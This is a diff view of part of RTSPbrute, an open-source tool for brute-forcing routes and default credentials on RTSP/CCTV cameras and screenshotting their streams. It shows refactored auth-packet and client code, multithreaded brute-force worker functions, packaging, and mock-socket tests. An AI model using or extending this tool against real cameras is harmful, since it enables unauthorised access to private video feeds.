    9 9   BarColumn(),
    skipped 12 lines
  • ■ ■ ■ ■ ■ ■
    modules/packet.py rtspbrute/modules/packet.py
    skipped 19 lines
    20 20   HA1 = _ha1(username, realm, password)
    21 21   HA2 = hashlib.md5(f"{option}:{uri}".encode("ascii")).hexdigest()
    22 22   response = hashlib.md5(f"{HA1}:{nonce}:{HA2}".encode("ascii")).hexdigest()
     23 + 
    23 24   return (
    24 25   "Authorization: Digest "
    25 26   f'username="{username}", '
    skipped 14 lines
    40 41   else:
    41 42   auth_str = f"{_basic_auth(credentials)}\r\n"
    42 43   
    43  - packet = (
     44 + return (
    44 45   f"DESCRIBE rtsp://{ip}:{port}{path} RTSP/1.0\r\n"
    45 46   f"CSeq: {cseq}\r\n"
    46 47   f"{auth_str}"
    skipped 1 lines
    48 49   "Accept: application/sdp\r\n"
    49 50   "\r\n"
    50 51   )
    51  - return packet
    52 52   
  • ■ ■ ■ ■ ■ ■
    modules/rtsp.py rtspbrute/modules/rtsp.py
    skipped 3 lines
    4 4  from time import sleep
    5 5  from typing import List, Union
    6 6   
    7  -from modules import utils
    8  -from modules.packet import describe
     7 +from rtspbrute.modules.packet import describe
     8 +from rtspbrute.modules.utils import find
    9 9   
    10 10  MAX_RETRIES = 2
    11 11   
    skipped 46 lines
    58 58   except ValueError as e:
    59 59   raise e
    60 60   
    61  - if port not in range(0, 65536):
    62  - raise ValueError(f"({port}) isn't valid port")
     61 + if port not in range(65536):
     62 + raise ValueError(f"{port} is not a valid port")
    63 63   
    64 64   self.ip = ip
    65 65   self.port = port
    skipped 2 lines
    68 68   self.status: Status = Status.NONE
    69 69   self.auth_method: AuthMethod = AuthMethod.NONE
    70 70   self.last_error: Union[Exception, None] = None
    71  - self.realm: Union[str, None] = None
    72  - self.nonce: Union[str, None] = None
     71 + self.realm: str = ""
     72 + self.nonce: str = ""
    73 73   self.socket = None
    74 74   self.timeout = timeout
    75  - self.packet = None
     75 + self.packet = ""
    76 76   self.cseq = 0
    77  - self.data = None
     77 + self.data = ""
    78 78   
    79 79   @property
    80 80   def route(self):
    skipped 17 lines
    98 98   if port is None:
    99 99   port = self.port
    100 100   
    101  - self.packet = None
     101 + self.packet = ""
    102 102   self.cseq = 0
    103  - self.data = None
     103 + self.data = ""
    104 104   retry = 0
    105 105   while retry < MAX_RETRIES and not self.is_connected:
    106 106   try:
    skipped 44 lines
    151 151   self.auth_method = AuthMethod.BASIC
    152 152   elif "Digest" in self.data:
    153 153   self.auth_method = AuthMethod.DIGEST
    154  - self.realm = utils.find("realm", self.data)
    155  - self.nonce = utils.find("nonce", self.data)
     154 + self.realm = find("realm", self.data)
     155 + self.nonce = find("nonce", self.data)
    156 156   else:
    157 157   self.auth_method = AuthMethod.NONE
    158 158   
    skipped 19 lines
  • ■ ■ ■ ■ ■ ■
    modules/utils.py rtspbrute/modules/utils.py
    1 1  import ipaddress
    2 2  import logging
    3 3  import re
    4  -import sys
    5 4  from pathlib import Path
    6 5  from typing import List
    7 6   
    8  -from modules.cli.output import console
    9  -from modules.rtsp import RTSPClient
     7 +from rtspbrute.modules.cli.output import console
    10 8   
    11  -logger = logging.getLogger("debugger")
     9 +RESULT_FILE: Path
     10 +HTML_FILE: Path
    12 11   
     12 +logger = logging.getLogger()
    13 13  reg = {
    14 14   "realm": re.compile(r'realm="(.*?)"'),
    15 15   "nonce": re.compile(r'nonce="(.*?)"'),
    skipped 21 lines
    37 37  var text = img.alt;
    38 38  navigator.clipboard.writeText(text);}</script>\n\n"""
    39 39   )
    40  - logger.debug(f"Generating {path}")
     40 + if logger.isEnabledFor(logging.DEBUG):
     41 + logger.debug(f"Generating {path}")
    41 42   with path.open("w") as f:
    42 43   f.write(html)
    43 44   
    44 45   
    45 46  def create_folder(path: Path):
    46  - logger.debug(f"Creating {path}")
     47 + if logger.isEnabledFor(logging.DEBUG):
     48 + logger.debug(f"Creating {path}")
    47 49   path.mkdir(parents=True)
    48 50   
    49 51   
    50 52  def create_file(path: Path):
    51  - logger.debug(f"Creating {path}")
     53 + if logger.isEnabledFor(logging.DEBUG):
     54 + logger.debug(f"Creating {path}")
    52 55   path.open("w", encoding="utf-8")
    53 56   
    54 57   
    55  -def append_result(
    56  - lock, result_file: Path, html_file: Path, pic_file: Path, rtsp: RTSPClient
    57  -):
    58  - with lock:
    59  - # Append to .txt result file
    60  - with result_file.open("a") as f:
    61  - f.write(f"{str(rtsp)}\n")
     58 +def append_result(pic_file: Path, rtsp_url: str):
     59 + # Append to .txt result file
     60 + with RESULT_FILE.open("a") as f:
     61 + f.write(f"{rtsp_url}\n")
    62 62   
    63  - # Insert to .html gallery file
    64  - if not pic_file.exists():
    65  - return
    66  - with html_file.open("a") as f:
     63 + # Insert to .html gallery file
     64 + if pic_file.exists():
     65 + with HTML_FILE.open("a") as f:
    67 66   f.write(
    68 67   (
    69 68   '<div class="responsive"><div class="gallery">\n'
    70  - f'<img src="{pic_file.parent.name}/{pic_file.name}" alt="{str(rtsp)}" '
     69 + f'<img src="{pic_file.parent.name}/{pic_file.name}" alt="{rtsp_url}" '
    71 70   'width="600" height="400" onclick="f(this)"></div></div>\n\n'
    72 71   )
    73 72   )
    skipped 11 lines
    85 84   if match:
    86 85   return match.group(1)
    87 86   else:
    88  - return None
     87 + return ""
    89 88   
    90 89   
    91  -def load_txt(path: str, name: str) -> List[str]:
     90 +def load_txt(path: Path, name: str) -> List[str]:
    92 91   result = []
    93  - try:
    94  - if name == "credentials":
    95  - result = [line.strip("\t\r") for line in get_lines(path)]
    96  - elif name == "routes":
    97  - result = get_lines(path)
    98  - elif name == "targets":
    99  - result = [
    100  - target for line in get_lines(path) for target in parse_input_line(line)
    101  - ]
    102  - except FileNotFoundError as e:
    103  - console.print(f"[red]Couldn't read {name} file at {path}: {repr(e)}")
    104  - sys.exit()
     92 + if name == "credentials":
     93 + result = [line.strip("\t\r") for line in get_lines(path)]
     94 + elif name == "routes":
     95 + result = get_lines(path)
     96 + elif name == "targets":
     97 + result = [
     98 + target for line in get_lines(path) for target in parse_input_line(line)
     99 + ]
    105 100   console.print(f"[yellow]Loaded {len(result)} {name} from {path}")
    106 101   return result
    107 102   
    108 103   
    109  -def get_lines(path: str) -> List[str]:
    110  - p = Path(path)
    111  - lines = p.read_text().splitlines()
    112  - return lines
     104 +def get_lines(path: Path) -> List[str]:
     105 + return path.read_text().splitlines()
    113 106   
    114 107   
    115 108  def parse_input_line(input_line: str) -> List[str]:
    skipped 36 lines
  • ■ ■ ■ ■ ■ ■
    rtspbrute/modules/worker.py
     1 +from queue import Queue
     2 +from threading import RLock
     3 + 
     4 +from rich.progress import TaskID
     5 + 
     6 +from rtspbrute.modules.attack import attack_credentials, attack_route, get_screenshot
     7 +from rtspbrute.modules.cli.output import ProgressBar
     8 +from rtspbrute.modules.rtsp import RTSPClient
     9 +from rtspbrute.modules.utils import append_result
     10 + 
     11 +PROGRESS_BAR: ProgressBar
     12 +CHECK_PROGRESS: TaskID
     13 +BRUTE_PROGRESS: TaskID
     14 +SCREENSHOT_PROGRESS: TaskID
     15 +LOCK = RLock()
     16 + 
     17 + 
     18 +def brute_routes(input_queue: Queue, output_queue: Queue) -> None:
     19 + while True:
     20 + target: RTSPClient = input_queue.get()
     21 + if target is None:
     22 + break
     23 + 
     24 + result = attack_route(target)
     25 + if result:
     26 + PROGRESS_BAR.add_total(BRUTE_PROGRESS)
     27 + output_queue.put(result)
     28 + 
     29 + PROGRESS_BAR.update(CHECK_PROGRESS, advance=1)
     30 + input_queue.task_done()
     31 + 
     32 + 
     33 +def brute_credentials(input_queue: Queue, output_queue: Queue) -> None:
     34 + while True:
     35 + target: RTSPClient = input_queue.get()
     36 + if target is None:
     37 + break
     38 + 
     39 + result = attack_credentials(target)
     40 + if result:
     41 + PROGRESS_BAR.add_total(SCREENSHOT_PROGRESS)
     42 + output_queue.put(str(result))
     43 + 
     44 + PROGRESS_BAR.update(BRUTE_PROGRESS, advance=1)
     45 + input_queue.task_done()
     46 + 
     47 + 
     48 +def screenshot_targets(input_queue: Queue) -> None:
     49 + while True:
     50 + target_url: str = input_queue.get()
     51 + if target_url is None:
     52 + break
     53 + 
     54 + image = get_screenshot(target_url)
     55 + if image:
     56 + with LOCK:
     57 + append_result(image, target_url)
     58 + 
     59 + PROGRESS_BAR.update(SCREENSHOT_PROGRESS, advance=1)
     60 + input_queue.task_done()
     61 + 
  • routes.txt rtspbrute/routes.txt
    Content is identical
  • ■ ■ ■ ■ ■ ■
    setup.py
     1 +import setuptools
     2 + 
     3 +from rtspbrute import __version__
     4 + 
     5 +with open("README.md", "r") as f:
     6 + long_description = f.read()
     7 + 
     8 +setuptools.setup(
     9 + name="rtspbrute",
     10 + version=__version__,
     11 + description="Tool for RTSP that brute-forces routes and credentials, makes screenshots!",
     12 + long_description=long_description,
     13 + long_description_content_type="text/markdown",
     14 + url="https://gitlab.com/woolf/RTSPbrute",
     15 + author="Woolf",
     16 + author_email="[email protected]",
     17 + classifiers=[
     18 + "Development Status :: 5 - Production/Stable",
     19 + "Environment :: Console",
     20 + "Intended Audience :: Developers",
     21 + "Intended Audience :: Information Technology",
     22 + "License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
     23 + "Natural Language :: English",
     24 + "Operating System :: OS Independent",
     25 + "Programming Language :: Python :: 3",
     26 + "Programming Language :: Python :: 3.7",
     27 + "Programming Language :: Python :: 3.8",
     28 + "Topic :: Internet",
     29 + "Topic :: Multimedia :: Video :: Capture",
     30 + "Topic :: Security",
     31 + "Topic :: Utilities",
     32 + ],
     33 + keywords="netstalking rtsp brute cctv",
     34 + project_urls={
     35 + "Source": "https://gitlab.com/woolf/RTSPbrute",
     36 + "Tracker": "https://gitlab.com/woolf/RTSPbrute/-/issues",
     37 + },
     38 + packages=setuptools.find_packages(),
     39 + install_requires=["av<9", "Pillow<8", "rich<6"],
     40 + python_requires=">=3.7",
     41 + package_data={"rtspbrute": ["credentials.txt", "routes.txt"],},
     42 + entry_points={"console_scripts": ["rtspbrute = rtspbrute.__main__:main"]},
     43 +)
     44 + 
  • ■ ■ ■ ■ ■
    tests/__init__.py
     1 + 
  • ■ ■ ■ ■ ■ ■
    tests/conftest.py
     1 +import pytest
     2 + 
     3 +from tests.fixtures.utils import html_file, result_file
     4 + 
  • ■ ■ ■ ■ ■ ■
    tests/fixtures/utils.py
     1 +import pytest
     2 + 
     3 +from rtspbrute.modules import utils
     4 + 
     5 + 
     6 +@pytest.fixture
     7 +def result_file(tmp_path):
     8 + """Creates `utils.RESULT_FILE` in `tmp_path` and returns it."""
     9 + utils.RESULT_FILE = tmp_path / "result.txt"
     10 + utils.RESULT_FILE.open("w", encoding="utf-8")
     11 + yield utils.RESULT_FILE
     12 + utils.RESULT_FILE = None
     13 + 
     14 + 
     15 +@pytest.fixture
     16 +def html_file(tmp_path):
     17 + """Creates `utils.HTML_FILE` in `tmp_path` and returns it."""
     18 + utils.HTML_FILE = tmp_path / "index.html"
     19 + utils.HTML_FILE.open("w", encoding="utf-8")
     20 + yield utils.HTML_FILE
     21 + utils.HTML_FILE = None
     22 + 
  • ■ ■ ■ ■ ■ ■
    tests/test_attack.py
     1 +from collections import namedtuple
     2 + 
     3 +import pytest
     4 + 
     5 +from rtspbrute.modules import attack, rtsp
     6 +from tests.test_packet import basic_auth_str
     7 + 
     8 + 
     9 +class MockSocket:
     10 + OK = b"RTSP/1.0 200 OK"
     11 + BAD = b"RTSP/1.0 400 Bad Request"
     12 + 
     13 + def __init__(self, valid_route: str, valid_auth: str = "") -> None:
     14 + self.valid_route: str = valid_route
     15 + self.valid_auth: str = valid_auth
     16 + self.packet: bytes = b""
     17 + 
     18 + def sendall(self, data: bytes):
     19 + self.packet = data
     20 + 
     21 + def recv(self, bufsize: int):
     22 + if (
     23 + self.valid_route.encode() in self.packet
     24 + and self.valid_auth.encode() in self.packet
     25 + ):
     26 + return self.OK
     27 + else:
     28 + return self.BAD
     29 + 
     30 + 
     31 +def factory_create_connection(valid_port, valid_route, valid_auth=""):
     32 + def _create_connection(address, timeout):
     33 + if address[1] == valid_port:
     34 + return MockSocket(valid_route, valid_auth)
     35 + else:
     36 + raise TimeoutError()
     37 + 
     38 + return _create_connection
     39 + 
     40 + 
     41 +def test_attack_route(monkeypatch):
     42 + valid_port = 8554
     43 + valid_route = "/valid/route"
     44 + attack.PORTS = [554, valid_port]
     45 + attack.ROUTES = ["/1", "/11", valid_route]
     46 + 
     47 + target = rtsp.RTSPClient("0.0.0.0")
     48 + _create_connection = factory_create_connection(valid_port, valid_route)
     49 + monkeypatch.setattr(rtsp.socket, "create_connection", _create_connection)
     50 + 
     51 + successful = attack.attack_route(target)
     52 + assert successful
     53 + assert target.data == MockSocket.OK.decode()
     54 + assert target.port == 8554
     55 + assert target.route == "/valid/route"
     56 + 
     57 + 
     58 +def test_attack_credentials(monkeypatch):
     59 + valid_credentials = "admin:admin"
     60 + valid_auth = basic_auth_str
     61 + attack.CREDENTIALS = ["user:user", "admin:12345", valid_credentials]
     62 + 
     63 + target = rtsp.RTSPClient("0.0.0.0")
     64 + _create_connection = factory_create_connection(
     65 + target.port, target.route, valid_auth
     66 + )
     67 + monkeypatch.setattr(rtsp.socket, "create_connection", _create_connection)
     68 + 
     69 + successful = attack.attack_credentials(target)
     70 + assert successful
     71 + assert target.credentials == valid_credentials
     72 + 
     73 + 
     74 +def test_is_video_stream():
     75 + CodecContext = namedtuple("CodecContext", ["format"])
     76 + Stream = namedtuple("Stream", ["profile", "start_time", "codec_context"])
     77 + 
     78 + valid_stream = Stream("1", 12301230, CodecContext("YUV"))
     79 + assert attack._is_video_stream(valid_stream)
     80 + 
     81 + bad_stream = Stream("1", 12301230, CodecContext(None))
     82 + assert not attack._is_video_stream(bad_stream)
     83 + 
  • ■ ■ ■ ■ ■ ■
    tests/test_input.py
     1 +from argparse import ArgumentTypeError
     2 + 
     3 +import pytest
     4 + 
     5 +from rtspbrute.modules.cli.input import file_path, port
     6 + 
     7 + 
     8 +def test_file_path(tmp_path):
     9 + assert file_path(tmp_path) == tmp_path
     10 + with pytest.raises(ArgumentTypeError) as excinfo:
     11 + non_existing_path = tmp_path / "file.txt"
     12 + file_path(non_existing_path)
     13 + assert str(non_existing_path) in str(excinfo.value)
     14 + 
     15 + 
     16 +def test_port():
     17 + assert port("554") == 554
     18 + with pytest.raises(ArgumentTypeError) as excinfo:
     19 + bad_port = 65536
     20 + port(bad_port)
     21 + assert str(bad_port) in str(excinfo.value)
     22 + 
  • ■ ■ ■ ■ ■ ■
    tests/test_packet.py
     1 +import pytest
     2 + 
     3 +from rtspbrute.modules import packet
     4 + 
     5 +# Credentials - "admin:admin"
     6 +basic_auth_str = "Authorization: Basic YWRtaW46YWRtaW4="
     7 +# Credentials - "user:user"
     8 +digest_auth_str = (
     9 + "Authorization: Digest "
     10 + 'username="user", '
     11 + 'realm="realm", '
     12 + 'nonce="nonce", '
     13 + 'uri="rtsp://0.0.0.0:554", '
     14 + 'response="03183d81a44f1e402bd7983108917856"'
     15 +)
     16 + 
     17 + 
     18 +@pytest.fixture
     19 +def clear_cache():
     20 + packet._basic_auth.cache_clear()
     21 + packet._ha1.cache_clear()
     22 + 
     23 + 
     24 +def test_basic_auth(clear_cache):
     25 + assert packet._basic_auth("admin:admin") == basic_auth_str
     26 + cache = packet._basic_auth.cache_info()
     27 + assert cache.hits == 0
     28 + assert cache.misses == 1
     29 + assert cache.currsize == 1
     30 + 
     31 + packet._basic_auth("admin:admin")
     32 + packet._basic_auth("user:user")
     33 + cache = packet._basic_auth.cache_info()
     34 + assert cache.hits == 1
     35 + assert cache.misses == 2
     36 + assert cache.currsize == 2
     37 + 
     38 + 
     39 +def test_ha1(clear_cache):
     40 + assert packet._ha1("user", "realm", "user") == "54cdcbe980ed379cae3e478ac29c67dc"
     41 + cache = packet._ha1.cache_info()
     42 + assert cache.hits == 0
     43 + assert cache.misses == 1
     44 + assert cache.currsize == 1
     45 + 
     46 + packet._ha1("user", "realm", "user")
     47 + packet._ha1("admin", "realm", "admin")
     48 + cache = packet._ha1.cache_info()
     49 + assert cache.hits == 1
     50 + assert cache.misses == 2
     51 + assert cache.currsize == 2
     52 + 
     53 + 
     54 +def test_digest_auth(clear_cache):
     55 + option = "DESCRIBE"
     56 + ip = "0.0.0.0"
     57 + port = 554
     58 + path = ""
     59 + username, password = "user", "user"
     60 + credentials = f"{username}:{password}"
     61 + realm = "realm"
     62 + nonce = "nonce"
     63 + assert (
     64 + packet._digest_auth(option, ip, port, path, credentials, realm, nonce)
     65 + == digest_auth_str
     66 + )
     67 + 
     68 + 
     69 +def test_describe(clear_cache):
     70 + ip = "0.0.0.0"
     71 + port = 554
     72 + path = ""
     73 + cseq = 1
     74 + credentials = ":"
     75 + assert packet.describe(ip, port, path, cseq, credentials) == (
     76 + f"DESCRIBE rtsp://{ip}:{port}{path} RTSP/1.0\r\n"
     77 + f"CSeq: {cseq}\r\n"
     78 + "User-Agent: Mozilla/5.0\r\n"
     79 + "Accept: application/sdp\r\n"
     80 + "\r\n"
     81 + )
     82 + 
     83 + credentials = "user:user"
     84 + realm = "realm"
     85 + nonce = "nonce"
     86 + assert packet.describe(ip, port, path, cseq, credentials, realm, nonce) == (
     87 + f"DESCRIBE rtsp://{ip}:{port}{path} RTSP/1.0\r\n"
     88 + f"CSeq: {cseq}\r\n"
     89 + f"{digest_auth_str}\r\n"
     90 + "User-Agent: Mozilla/5.0\r\n"
     91 + "Accept: application/sdp\r\n"
     92 + "\r\n"
     93 + )
     94 + 
     95 + credentials = "admin:admin"
     96 + assert packet.describe(ip, port, path, cseq, credentials) == (
     97 + f"DESCRIBE rtsp://{ip}:{port}{path} RTSP/1.0\r\n"
     98 + f"CSeq: {cseq}\r\n"
     99 + f"{basic_auth_str}\r\n"
     100 + "User-Agent: Mozilla/5.0\r\n"
     101 + "Accept: application/sdp\r\n"
     102 + "\r\n"
     103 + )
     104 + 
  • ■ ■ ■ ■ ■ ■
    tests/test_rtsp.py
     1 +import socket
     2 +from typing import Type
     3 + 
     4 +import pytest
     5 + 
     6 +from rtspbrute.modules.rtsp import AuthMethod, RTSPClient, Status
     7 + 
     8 + 
     9 +def test_init():
     10 + rtsp = RTSPClient("0.0.0.0")
     11 + assert rtsp.ip == "0.0.0.0"
     12 + assert rtsp.port == 554
     13 + assert rtsp.timeout == 2
     14 + assert rtsp.credentials == ":"
     15 + 
     16 + 
     17 +def test_init_error():
     18 + with pytest.raises(ValueError) as excinfo:
     19 + rtsp = RTSPClient("")
     20 + assert "'' does not appear to be an IPv4 or IPv6 address" in str(excinfo.value)
     21 + 
     22 + with pytest.raises(ValueError) as excinfo:
     23 + rtsp = RTSPClient("0.0.0.0", 65536)
     24 + assert "65536 is not a valid port" in str(excinfo.value)
     25 + 
     26 + 
     27 +def test_route():
     28 + rtsp = RTSPClient("0.0.0.0")
     29 + assert rtsp.route == ""
     30 + rtsp.routes.append("/1")
     31 + rtsp.routes.append("/2")
     32 + assert rtsp.route == "/1"
     33 + 
     34 + 
     35 +def test_is_connected():
     36 + rtsp = RTSPClient("0.0.0.0")
     37 + assert not rtsp.is_connected
     38 + rtsp.status = Status.CONNECTED
     39 + assert rtsp.is_connected
     40 + 
     41 + 
     42 +def test_is_authorized():
     43 + rtsp = RTSPClient("0.0.0.0")
     44 + assert not rtsp.is_authorized
     45 + rtsp.data = "200 OK"
     46 + assert rtsp.is_authorized
     47 + 
     48 + 
     49 +def test_connect_successful(monkeypatch):
     50 + def _create_connection(address, timeout):
     51 + return (address, timeout)
     52 + 
     53 + monkeypatch.setattr(socket, "create_connection", _create_connection)
     54 + 
     55 + rtsp = RTSPClient("0.0.0.0")
     56 + connected = rtsp.connect()
     57 + assert connected
     58 + assert rtsp.socket == (("0.0.0.0", 554), 2)
     59 + assert rtsp.status is Status.CONNECTED
     60 + assert not rtsp.last_error
     61 + 
     62 + 
     63 +def test_connect_unsuccessful(monkeypatch):
     64 + def _create_connection(address, timeout):
     65 + raise TimeoutError(address, timeout)
     66 + 
     67 + monkeypatch.setattr(socket, "create_connection", _create_connection)
     68 + 
     69 + rtsp = RTSPClient("0.0.0.0")
     70 + connected = rtsp.connect(8554)
     71 + assert not connected
     72 + assert not rtsp.socket
     73 + assert rtsp.status is Status.TIMEOUT
     74 + assert rtsp.last_error.args == (("0.0.0.0", 8554), 2)
     75 + 
     76 + 
     77 +def test_authorize_without_connection():
     78 + rtsp = RTSPClient("0.0.0.0")
     79 + authorized = rtsp.authorize()
     80 + assert not authorized
     81 + 
     82 + 
     83 +class MockSocket:
     84 + def __init__(
     85 + self,
     86 + successful: bool = True,
     87 + exception: Type[Exception] = TimeoutError,
     88 + data: str = "",
     89 + ) -> None:
     90 + self.successful = successful
     91 + self.exception = exception
     92 + self.data_to_recv = data
     93 + 
     94 + self.sent_data: bytes
     95 + self.recv_bufsize: int
     96 + 
     97 + def sendall(self, data):
     98 + if self.successful:
     99 + self.sent_data = data
     100 + return
     101 + else:
     102 + raise self.exception()
     103 + 
     104 + def recv(self, bufsize):
     105 + self.recv_bufsize = bufsize
     106 + return self.data_to_recv.encode()
     107 + 
     108 + def close(self):
     109 + return
     110 + 
     111 + 
     112 +def test_authorize_successful():
     113 + rtsp = RTSPClient("0.0.0.0")
     114 + rtsp.status = Status.CONNECTED
     115 + rtsp.socket = MockSocket(
     116 + data="RTSP/1.0 200 OK\r\nCSeq: 1\r\nServer: Hipcam RealServer/V1.0\r\n\r\n"
     117 + )
     118 + authorized = rtsp.authorize()
     119 + assert authorized
     120 + assert rtsp.cseq == 1
     121 + assert rtsp.packet
     122 + assert rtsp.socket.sent_data
     123 + assert rtsp.data
     124 + assert rtsp.auth_method is AuthMethod.NONE
     125 + 
     126 + 
     127 +def test_authorize_unsuccessful():
     128 + rtsp = RTSPClient("0.0.0.0")
     129 + rtsp.status = Status.CONNECTED
     130 + rtsp.socket = MockSocket(successful=False)
     131 + authorized = rtsp.authorize()
     132 + assert not authorized
     133 + assert rtsp.cseq == 1
     134 + assert rtsp.packet
     135 + assert not hasattr(rtsp.socket, "sent_data")
     136 + assert not rtsp.data
     137 + assert rtsp.status is Status.TIMEOUT
     138 + assert rtsp.last_error
     139 + 
     140 + 
     141 +def test_str():
     142 + rtsp = RTSPClient("0.0.0.0")
     143 + assert str(rtsp) == f"rtsp://{rtsp.ip}:{rtsp.port}"
     144 + rtsp.port = 8554
     145 + rtsp.credentials = "admin:admin"
     146 + rtsp.routes.append("/1")
     147 + assert str(rtsp) == f"rtsp://{rtsp.credentials}@{rtsp.ip}:{rtsp.port}{rtsp.route}"
     148 + 
  • ■ ■ ■ ■ ■ ■
    tests/test_utils.py
     1 +import pytest
     2 + 
     3 +from rtspbrute.modules import utils
     4 + 
     5 + 
     6 +class TestAppendResult:
     7 + rtsp_url = "rtsp://1.1.1.1:554/1"
     8 + 
     9 + def test_result_file_only(self, result_file, tmp_path):
     10 + pic_file = tmp_path / "non_existing.file"
     11 + 
     12 + utils.append_result(pic_file, self.rtsp_url)
     13 + assert self.rtsp_url in result_file.read_text()
     14 + 
     15 + def test_html_file(self, result_file, html_file, tmp_path):
     16 + pic_file = tmp_path / "picture.jpg"
     17 + pic_file.open("w", encoding="utf-8")
     18 + 
     19 + utils.append_result(pic_file, self.rtsp_url)
     20 + assert self.rtsp_url in result_file.read_text()
     21 + assert f'src="{pic_file.parent.name}/{pic_file.name}"' in html_file.read_text()
     22 + assert f'alt="{self.rtsp_url}"' in html_file.read_text()
     23 + 
     24 + 
     25 +def test_escape_chars():
     26 + text = r'slashes\/column:star*mark?quotes"arrows<>bar|'
     27 + assert utils.escape_chars(text) == "slashes__column_star_mark_quotes_arrows__bar_"
     28 + 
     29 + 
     30 +class TestFind:
     31 + response_with_auth = """
     32 + RTSP/1.0 401 Unauthorized
     33 + CSeq: 1
     34 + Server: Hipcam RealServer/V1.0
     35 + WWW-Authenticate: Digest realm="Hipcam RealServer/V1.0", nonce="somenonce"
     36 + """
     37 + response_without_auth = """
     38 + RTSP/1.0 400 Bad Request
     39 + CSeq: 2
     40 + Server: Hipcam RealServer/V1.0
     41 + """
     42 + 
     43 + def test_realm(self):
     44 + var = "realm"
     45 + assert utils.find(var, self.response_with_auth) == "Hipcam RealServer/V1.0"
     46 + assert utils.find(var, self.response_without_auth) == ""
     47 + 
     48 + def test_nonce(self):
     49 + var = "nonce"
     50 + assert utils.find(var, self.response_with_auth) == "somenonce"
     51 + assert utils.find(var, self.response_without_auth) == ""
     52 + 
     53 + 
     54 +class TestLoadTxt:
     55 + def test_credentials(self, tmp_path):
     56 + credentials = "user:\nadmin:12345\t\n1111:1111"
     57 + 
     58 + p = tmp_path / "credentials.txt"
     59 + p.write_text(credentials)
     60 + 
     61 + assert utils.load_txt(p, "credentials") == credentials.split()
     62 + 
     63 + def test_routes(self, tmp_path):
     64 + routes = "/1\n/11\n/h264"
     65 + 
     66 + p = tmp_path / "routes.txt"
     67 + p.write_text(routes)
     68 + 
     69 + assert utils.load_txt(p, "routes") == routes.split()
     70 + 
     71 + def test_targets(self, tmp_path):
     72 + targets = "1.2.3.4\n192.168.0.0/29\n1.1.1.1 - 1.1.1.4"
     73 + 
     74 + p = tmp_path / "targets.txt"
     75 + p.write_text(targets)
     76 + 
     77 + assert utils.load_txt(p, "targets") == [
     78 + "1.2.3.4",
     79 + "192.168.0.0",
     80 + "192.168.0.1",
     81 + "192.168.0.2",
     82 + "192.168.0.3",
     83 + "192.168.0.4",
     84 + "192.168.0.5",
     85 + "192.168.0.6",
     86 + "192.168.0.7",
     87 + "1.1.1.1",
     88 + "1.1.1.2",
     89 + "1.1.1.3",
     90 + "1.1.1.4",
     91 + ]
     92 + 
     93 + 
     94 +def test_get_lines(tmp_path):
     95 + text = "test\nfunc\nslpitlines"
     96 + 
     97 + p = tmp_path / "test.txt"
     98 + p.write_text(text)
     99 + 
     100 + assert utils.get_lines(p) == text.split()
     101 + 
     102 + 
     103 +class TestParseInputLine:
     104 + def test_single_ip(self):
     105 + assert utils.parse_input_line("1.2.3.4") == ["1.2.3.4"]
     106 + 
     107 + def test_ip_range(self):
     108 + assert utils.parse_input_line("1.1.1.1-1.1.1.4") == [
     109 + "1.1.1.1",
     110 + "1.1.1.2",
     111 + "1.1.1.3",
     112 + "1.1.1.4",
     113 + ]
     114 + assert utils.parse_input_line("1.1.1.1 - 1.1.1.4") == [
     115 + "1.1.1.1",
     116 + "1.1.1.2",
     117 + "1.1.1.3",
     118 + "1.1.1.4",
     119 + ]
     120 + 
     121 + def test_cidr(self):
     122 + assert utils.parse_input_line("192.168.0.0/30") == [
     123 + "192.168.0.0",
     124 + "192.168.0.1",
     125 + "192.168.0.2",
     126 + "192.168.0.3",
     127 + ]
     128 + 
     129 + def test_bad_ip(self):
     130 + assert utils.parse_input_line("666.6.6.6") == []
     131 + 
  • ■ ■ ■ ■ ■ ■
    tests/test_worker.py
     1 +from queue import Queue
     2 + 
     3 +import pytest
     4 + 
     5 +from rtspbrute.modules import worker
     6 +from rtspbrute.modules.cli.output import ProgressBar
     7 +from rtspbrute.modules.rtsp import RTSPClient
     8 + 
     9 +target = RTSPClient("0.0.0.0")
     10 + 
     11 + 
     12 +@pytest.fixture
     13 +def queues():
     14 + input_queue = Queue()
     15 + output_queue = Queue()
     16 + input_queue.put(target)
     17 + input_queue.put(None)
     18 + 
     19 + return input_queue, output_queue
     20 + 
     21 + 
     22 +class TestBruteRoutes:
     23 + def test_with_result(self, queues, monkeypatch):
     24 + input_queue, output_queue = queues
     25 + worker.PROGRESS_BAR = ProgressBar()
     26 + worker.CHECK_PROGRESS = worker.PROGRESS_BAR.add_task("Check", total=1)
     27 + worker.BRUTE_PROGRESS = worker.PROGRESS_BAR.add_task("Brute", total=0)
     28 + check_task = worker.PROGRESS_BAR.tasks[worker.CHECK_PROGRESS]
     29 + brute_task = worker.PROGRESS_BAR.tasks[worker.BRUTE_PROGRESS]
     30 + 
     31 + _attack_route_good = lambda t: t
     32 + monkeypatch.setattr(worker, "attack_route", _attack_route_good)
     33 + 
     34 + worker.brute_routes(input_queue, output_queue)
     35 + assert input_queue.qsize() == 0
     36 + assert target == output_queue.get()
     37 + assert output_queue.qsize() == 0
     38 + assert check_task.finished
     39 + assert check_task.remaining == 0
     40 + assert not brute_task.finished
     41 + assert brute_task.remaining == 1
     42 + 
     43 + def test_without_result(self, queues, monkeypatch):
     44 + input_queue, output_queue = queues
     45 + worker.PROGRESS_BAR = ProgressBar()
     46 + worker.CHECK_PROGRESS = worker.PROGRESS_BAR.add_task("Check", total=1)
     47 + worker.BRUTE_PROGRESS = worker.PROGRESS_BAR.add_task("Brute", total=0)
     48 + check_task = worker.PROGRESS_BAR.tasks[worker.CHECK_PROGRESS]
     49 + brute_task = worker.PROGRESS_BAR.tasks[worker.BRUTE_PROGRESS]
     50 + 
     51 + _attack_route_bad = lambda t: False
     52 + monkeypatch.setattr(worker, "attack_route", _attack_route_bad)
     53 + 
     54 + worker.brute_routes(input_queue, output_queue)
     55 + assert input_queue.qsize() == 0
     56 + assert output_queue.qsize() == 0
     57 + assert check_task.finished
     58 + assert check_task.remaining == 0
     59 + assert brute_task.finished
     60 + assert brute_task.remaining == 0
     61 + 
     62 + 
     63 +class TestBruteCredentials:
     64 + def test_with_result(self, queues, monkeypatch):
     65 + input_queue, output_queue = queues
     66 + worker.PROGRESS_BAR = ProgressBar()
     67 + worker.BRUTE_PROGRESS = worker.PROGRESS_BAR.add_task("Brute", total=1)
     68 + worker.SCREENSHOT_PROGRESS = worker.PROGRESS_BAR.add_task("Screenshot", total=0)
     69 + brute_task = worker.PROGRESS_BAR.tasks[worker.BRUTE_PROGRESS]
